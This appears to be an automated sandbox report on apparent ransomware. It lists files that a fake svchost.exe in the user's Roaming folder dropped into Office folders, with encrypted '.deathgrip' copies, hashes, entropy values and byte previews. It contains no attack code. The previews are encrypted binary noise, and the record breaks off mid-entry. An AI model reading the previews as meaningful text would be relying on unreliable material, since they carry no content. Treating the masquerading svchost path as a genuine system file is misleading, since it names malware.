                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701851v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701900v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701901v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701901v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.819172313675376
                                                          Encrypted:false
                                                          SSDEEP:48:Vm9mtJNMfhcnRXJRhmzaKM9KwB0rtfclujuNH:E9c7Rzhd8FrQ8uNH
                                                          MD5:3C200C7F36A036D91C2D7B0A1CBE87F0
                                                          SHA1:D13C30E17A84855459D83DD46F3D7DBDB75326C6
                                                          SHA-256:40A3F34BD7C1085B582CEA2612C65592A66267B168116D0C83D0B90848BFBAFF
                                                          SHA-512:3D0AB44367DE5F14F0BD08B7F4A712D345ECDC91F773B0A87D3661C7344834B2ECF4A3B9DC32865D3EAFD2ECFFBDC19D86D71CDFC32C34622189F569B6E31499
                                                          Malicious:false
                                                          Preview:............?uo.r0.Y$9.m..b....,P2tVy.a9;.-;..z..9....1F..H..;...v.s...Z.B].1.1n..#.h.7.......F...?..I..(..#K9..t..wd......FVL2.....}1..$..#z .@........%.....p..;e.9.............e....R0Ui..;..(&c\..../...)/v..(.k...9..'.8.8W]...m..X..c..o..HH.d.........s..#.].....'...`.[G......qJ...9...<P..v.@.E..jR.}o..........x.F.#...l..W6.[j.J.....Yg..U........A.cQ.q.#.k.A5...a%w..=-..%......H.=-u.w.Rw.Lq..' .......q...k.o.*_.....m.7...(..A|O.R[.Kj.H..s...o|.d$....e...3c.h..%I...m1...e.f6.A..[...R.....y...X.......g.t...(J...M/E...%....0.#..6q..u...;..._..{..m6"..`..0.&$...&.!.....O..j..:..*.F............. ...k....Z..1..;.8.Y..].......*=e.....s&r...P}_..a......^..(..RW.j..a...A........w.DP.c...Gb..i..v..a..I%.rp....l....J...2....,t9....)..)...|.F..&.J7k...|.B|Fqdp..n...qe{....~.o........f=..=>|......UJ..T.A..t...O...)=...=&...<Ba.SB.o...j...Q#)So=\o.p..L..*..F.[~.3V.O...m..-e.G..cdU {.......+..V&...NK.f..N.h~(...^...4w.@..J..%..)Q...n .v.#(..~

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701950v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701950v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1744
                                                          Entropy (8bit):7.822071431789293
                                                          Encrypted:false
                                                          SSDEEP:48:rEoocAHcgU7SrinHN6QY6//56Nu1G6IUqaSp7rL:rEoGHcqI6k//5Jpfk7P
                                                          MD5:C6160DC22E27991B01A9FC9555E1CE22
                                                          SHA1:E399445FE2CFD4EFFD5DD9085E9BA12C8C314849
                                                          SHA-256:74B0F71BB18EB47AF1B4BCA1F75F3A2963208C95D41DEE79AB89F6A942A15D8A
                                                          SHA-512:56BC3ED0162AC876176B4A4908AB166E22A554F6404B0C2229A8FBF16E873A92AB75A6CE75452FB9A5FFED1CDB3A985CA34055AF0C467743193C9C005D457F9B
                                                          Malicious:false
                                                          Preview:.........:...W........Yhk.3......+.r...l_......`A..^*.... ".6..U.5*.u...,5.K...|.2.3....{.......N.+.v.Q'.gG,......$.;.T..]._..3p.....$..)r.....>..a.......}.xD..J}..R.....mB.....G.......]'....&k..7..Q..._..RE..C...Qn......@...B...e4.~&..1.<.IU(..g..#[:..[..VY4.....|ua.jb,E...V......."J9...i.m..q..7.`.e6xGrX<%.6%..<...).g!gM.A.M.Go..0:.$.=...X'^e:i....r..?d...X3a*$.s<..CQ.............(..f.j..RB..+'^ z}.9....3...pF"d.1..X1.....\.}.K5.2]........6.....D..F...d...P.\;P....<.,T)UC..E..?.z....`....t.*...}.....'....WX..w.........8.C..C.}G..5qn....>f.A8......hrE..!k.y)...r`..Y..X|C"....(._..iQi...Gyhn{...2...YH.[d..#-..&.A-....T.H..#.E..N.Cl-....l......-S...E4.v.)d'.9s...A[;m..AW...o..v...t.3Tk&........$[....&.A.+..v.?.I...N+....R6s.;.P....-.....=.'.O...dKU...Hb..<..Io'.S^....." g..-j.^.o.w.s.A.+.A.8+...yDm..l.t$T.w.....Hh,.o..E`|..X4...MJC=...~Ft...mZ..7T..MN.s...^.3..+..MK^....u..m!..-..$.&-q..J.m.....u..NT..|...[l].0U.,.g8D-,..1...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701951v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701951v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1776
                                                          Entropy (8bit):7.814200137227033
                                                          Encrypted:false
                                                          SSDEEP:24:ydNNBlLq0ghQsHc8893u47jjKMek8KOn9pcZ6Hx9aNFgPtit12XOyYU1FyyiI9qj:ydPaysHnfAvo1KE7a+yNaPcnwOgR0V
                                                          MD5:F6400F33C334938CFB2A0059CF481D4B
                                                          SHA1:7614B0BD477548257C4623C476AE1EFEB195BE63
                                                          SHA-256:2B81069D3AFE083CAB85826A44584ECCD716286722B91B71F514407C5C1FCBD9
                                                          SHA-512:76A177E6D4AD900DD46F73FF79A6A58DB1E4364AED636A96881C9D7F866E9D887481DA6B553CC40432E5BF93D7FE5C163B6E7CB8381CE3D1EDB607C6811D00E1
                                                          Malicious:false
                                                          Preview:.........x]...^.......:/'...p]P3W...o.5_w|..4..r....y.......a=q..u.J..@...M..S.....F...R.eF.*.C:..1.A............./..7..Rb.h...4j..K..+u...7....j ;.T..../.......d..k....x..f....M.nL...t.0.o...Ix .jI..<..?z...a."...M...VV'O.u...TU.Q......X@...v..RO.H.."$.....+}*...&A...c.<...\9.............;..j.//`B..ay..,...}...M=...1b ..5:.`.Kz.D..g.Y$......]........i../dV.....T..]N.......R../l..(G.UH.e.........73...\0.*q3...x...>.,g....N.K..=..gg..wxR3.0..O.......r:OzjRb".,.k.q.N..*..&o.<l.(G...a..n..Qv..\Ng..dK....L-I.F.....4..M.r.DL.{.....}..q..WWi(......s...u...$....id.y......u.......^B.......dq..N.:m...-.......F......P.Y...x<.7n..w...9..B$....7.|3_&......4;...n0\.+|.!)[..|..{......`F...\.u.q..L.Y.J......w..8.`.-..Et%.H.E>.....w\.......?..r..hY..J.iOW.%..b..4.........>jy...Cb....]| yO....g...!..F.rC.2.+.s=...H..~....T..B...6....i..v...P9.5#.eahp..........G..n...rlh>+.e.ONd,.%?.......y...._G.mF..xb.: ...=..S.~Y.....$..3...J~......r.T..6........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702000v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702000v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702001v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702100v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702100v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702301v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702301v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.822667167279572
                                                          Encrypted:false
                                                          SSDEEP:48:CjxfqeUTnz/cXRdKrh+SNtrO+4ap7KoVTmY1TEmjY:sKzEX4hfHO+dRVaY1s
                                                          MD5:4B4E6AE7EA7D68EDF9E56DA963AE3179
                                                          SHA1:79471C6F567CD9FA5C274F1169F2E42DB7AB501E
                                                          SHA-256:174BE597FBEA9E6BBDD182310BB135D735E2F2F1ADC90D32FF217FD17E2F73B7
                                                          SHA-512:B1DA9201460652E71B4F3685255A7FC24FB32BB684A815088FE5CCA950AFA39671F092312BB293EA2DAC258AA780321F05F52D36560E1B416236C75707F2BE51
                                                          Malicious:false
                                                          Preview:.........[...*8..m2.QkU.e.~5Ij@uNj..d.,._....{.T\.3W1..5otk...{.3..?.......n7...XM"...;../......*w....y....E$..F..g.u.R...@.....o@Z?u..X....l}...F..}.l.p....\.?........'.J3.,..$b......P9..s%...$.G."."#...m....QW+<....!.N...v2.[....X.P.O..^..r......qZ../..>.d..K.^.3,.{....EqGO.M.(`....F.^........7.`9Q.e..:...S.j..%b.p3.....S.v.[.........F........b.)..%....o{.$8JG4.}...LZj..=....D%._E.\ ^;..Z..x]5q..o..i...mz]......k@....Rr.<..~h.uG*...P-.2...+..v/`..~.....2.I#."0..%S...2.......y.]1.'.',...&W..j.........{N....@"D;..f.).;8.?.`.>...b.V;{....S.*dA..N.h.c"....g......'V...FY...6....@i..?ZG.|..y..f........n...`.2a..|.H..l9..~..Hs.Ttp..|.-fC......M......e..4Q.sG J.......5.[Q..._@..Q-,e...H...Cn.W.i.5..=.w...}....P.Gk.Y..4gd=.^...M.%..<X.~...q.lAd6....06.7.uM../H...M..m...O...a.%..<.........b...K.qF.Qa....[h...e..../.s....]..Cj.<M....J..0..9=5QYH...I.e.n.e..r..,..;...w...8...*A..[-..R#...{)2.$RB!!..)...@..8...../.a..M.R.T..l.X..G..|.v.2...%..x...U..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1120
                                                          Entropy (8bit):7.6500379449994975
                                                          Encrypted:false
                                                          SSDEEP:24:BH0/IYpJe7wl4EFJ4+4keFXnAfoFt0fiXFu1kuvWSDY7k8zPCJY:BdQw09J4e+nNuiI1FvWS87khW
                                                          MD5:91DE70EFBA29B288BBB9CF58E64A8DB5
                                                          SHA1:28337316943CA3EF7AD76A7EB50C74F06BA708B3
                                                          SHA-256:9934E4B7BB8828723D25A50224CB2E28806A7CFF8F1ED0F86A45CD6A67BBA0FE
                                                          SHA-512:6F90A607E91B67E0A3A713B6C08F51E14631E401093D0E63281A64E22C464C223F98D4A1E918D50553F8EA27D5FF24E06D20FDD0F8B310E7B4574918C0D0E021
                                                          Malicious:false
                                                          Preview:.............e.....z....f.V.\.....nG...".1l%>.X....{No.o@!..N%.:N.>..A]0N..)m.W..T.(.......f...^*......tP...9e....'.p?i.?............;...$.e.b.\;...&.8..........5?w>5..TRN6.......}....@..e..lU.|.p.A{r.+*.....v........!.....'&..(mWHF.......3.8..M.H..Y%t}...h.,..Q7J.....i...p....,Y.!'........RL...{Smo....w.e..$.....b.V..,...9.a...]VB.gw.z.|........;.F0o...cR..X+..N..v.x[...\32..F.]N^.Q...j.....?.7gH.uFB....M...GH&.y..A......%=..w..'y.+.Y:..(..0!.$w..=}G8....M;N..O...LE.I..:....8...#.._..:..v...&z.I.M.}.<.(..Xt.....N...T&..|Z...c.(......gW._oK..8]3q.C.`....w'%....R,.(=.3r<..1...ud.x...7!]<..0.$..[.r.36?..j......U..$v...^@.4...>..N_bjE....t~}...B....p.?.b.t.......yMJ.a....7...vy.{..<<.s..`.D}...l-UU-V.hf.Q.?..........p#..V.VuvBOtiZWigsgsLME9Sk7ED24LI2o7/A0IX0w79MIJg50T3vaklWYbaBgIbkYqQhUdIjwr2uFZQEtVr7IYQKVman5jM5TtjRwV+s2mOAF6Zlbt2LANRoX75fB72SYLgJTHBYitLJHgDSr1penUJNz9YZDrhYzyAp0mhaqjkygNoBVVurHfbUiaABWXhoNl9C21PNcNN30zSlr4AHnj+2703gmQLTqd5QU

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.992651579542604
                                                          Encrypted:true
                                                          SSDEEP:768:KScEkZokmM/qQXg7bJ39QyOE14UKj7u7LIPY2:mpDrSmg7N39QeU7u4A2
                                                          MD5:11589AA10B436CBFFA21A50C5B765244
                                                          SHA1:CCBCF870F1D0B280DB9475FCA1E1701EACECC427
                                                          SHA-256:5EB4ADB1F53EF77436C1F6D550C0E85A6393B249730C2161B3B2A2AEEC39FB2A
                                                          SHA-512:131BE74074C0F98D9D176AC0ED0B7C57C97780591F0E5044960189F97BAE1749E761A4B429EC25D33707FEDB638775649A215D08883B23FE1243745EEFBA9737
                                                          Malicious:true
                                                          Preview:.........7.9fl:...xs....N.>.....e....j..Xp...0 .V.......M.<.-.....:.`....P.wa......-.P.&.......$3.......#.~0......W.B:..u.D"N.k.....q....<(....v1C.]...a....q@..y-Rp.....#.*...&e..'..D...wv.l....*......c......%:..ax..jD..l.7..k.Z..o.S...Y<.^s2..wR.S...4...3...8...{m....=`....E...{-.f..p1..j...r.....].B.....N,..{........A...ZR.0i]........?|.%m..!.a...........P...j..y.Z....w..d.0I.E..I.%vx...E.B..d\ .....,../.c|.....J.<.....@..\..RU.....X..>.S.....Br.....J...|....b.-,...@.7A..Dtr=.uM.)..9.kA,.7a......MWD.l. ..9.e....2.P9..g.(.OQ.PU.)...........M.[....F..X..p..4.VtEH.g....4...M.....V...?....%E.......7./b$...H.6.)@.y....#UE.S.%Hs...^...p8m.....r3.>..B.5p..CD.m.*..M5.n...........M..#..]..}@>L.!.J.Ql....v6T.R..........f.A.>k=.sp..?..Y.U.O(K.Nw...$=.8...h.=......:.....Xg..l...SH..^.$......6.I.V.&...d7..L.U...+.....qpPnTZ........._....%.....$;..w.]o....`!.......S.i{.".,Q#..R...:....a...UPQ}...b..6...#.n,.K2...pv5_1...&..jE....z..k. ...o...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.993233697374732
                                                          Encrypted:true
                                                          SSDEEP:384:9VUsR0AKP7rLopgBh3yWE/R0YK4nHKoeVyhkL3nocA7NcUCOK6Jt9HmorO7L+v:4sGtEpKCWsD1nHfeBYcSZJOoqGv
                                                          MD5:037C067B06F73906B0CF5603FB85A65C
                                                          SHA1:1C67DC303A9F4B612CC2894E9150A80B35AEEEFE
                                                          SHA-256:873532EA252DA6A482D07615DBA64A4FCE1DECFC760F5489E9E052489B1499F0
                                                          SHA-512:B81F2263E4A16AB9251E8DA12A61E523F7306D3AEE0690027A41CF0676C90BE7006373A87ECD6249C18C38E0D3591E50B8C560E93D351B70E35918C107C8C7EF
                                                          Malicious:true
                                                          Preview:........(.Z.9..*.K/(W"A..;..3.....=..X..]t.p."]....[..w...dgx...{..5...K..)...c.MF=...U.....T..h.0....3...`Hy..{.Ll..q..4D....r..m.xot.V..Y...Vi^/.@...<......YW~.*..V.j.S.CPJ..iS..L...N5.jG..,)M...QW.Q.`.k...,.v...n.s.l..X...9M.....T.X....l........^+m..[#_..k..\../..5.]..)...h..b...A.......... P..H.......jVj.......$..kd{..1..s...e.*V..<...N"..-....-q..W...i.u..-...].(..a........!d.)z.X....Y....j.}....k..8_&>}..2xHV..s..%..G....C..v...,.QVW%....V.;..4e.'.D..: 8w....(.4..p..K.P+....zp?..f....J.{..w.....E..'.,.'.i9.qY.....}:.(Qk...U..........s.?.l...0.),.8.z...J.!\...!......o.!.HQ_......H(o...5.}../.]..?..9.V........r...3..R...2DVn.s.o."..../}.....(%...iGar.;.G.%......ULPf)...<.u..k..\$N..".F.;.on/.4B..%.F...V..s..MIN,..S.`...S.A.C.S..0.y4..>.h...^.;...|S....Gt.u^`.tP9....=...+7."..$b.~....q..{!=,....+0eWR.(A..?...^.7.&.....:U.5..$N...>qKN.5......wa..e.7....n.0..GK..Y(..iN..._,.j.XQ..W;..6.P..::..7..,...B:R.....n.../.....sh.Z.&.M.|.z..t.|r.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24944
                                                          Entropy (8bit):7.99119841684219
                                                          Encrypted:true
                                                          SSDEEP:384:+KdWrg4yEIhPAnTi/nuUkYbJqAkeRWfU4iNU1OJdkP6hbJEj8rh3Zh63hRJOsrFg:r4yDhITc5k6liUZUsWCliozh63hFkfJ
                                                          MD5:0AD39D6938081E71BCED863610428C04
                                                          SHA1:C7B157016B9233928A397F12792BBB43098AD389
                                                          SHA-256:4F20B69CD6864940378448E23AD6EEE37AB083067F88FCB3A1D5843FB04C47C6
